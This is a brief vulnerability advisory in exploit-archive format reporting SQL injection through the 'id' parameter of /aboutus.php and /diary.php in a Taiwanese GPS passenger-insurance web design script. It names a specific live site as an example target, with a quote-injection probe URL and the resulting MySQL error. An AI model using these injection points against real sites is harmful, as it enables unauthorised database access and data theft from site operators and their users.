##################################################################### # Exploit Title : Taiwan GPS Satellite Positioning Passenger Web Design 1.0 SQL Injection # Author [ Discovered By ] : KingSkrupellos # Date : 30/12/2018 # Owner of the Script [ E-Mail ] : qkelly@gmail.com # Tested On : Windows # Exploit Risk : Medium # Version Information : 1.0 # Vulnerability Type : CWE-89 [ Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') ] # CXSecurity Exploit Reference Link : cxsecurity.com/ascii/WLB-2018050318 ##################################################################### # Exploit Title : The company has insured GPS satellite positioning passenger insurance million Web Design Taiwan SQL Injection Vulnerability ##################################################################### # Exploit : /aboutus.php?id=[SQL Injection] # Exploit : /diary.php?id=[SQL Injection] ##################################################################### # Example Site => hitaxi.tw/aboutus.php?id=1%27 => [ Proof of Concept for SQL Inj ] => archive.is/VSC6n # Database Error Message: Could not query database! You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1''' at line 1 Script: /aboutus.php?id=1%27 ##################################################################### # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team #####################################################################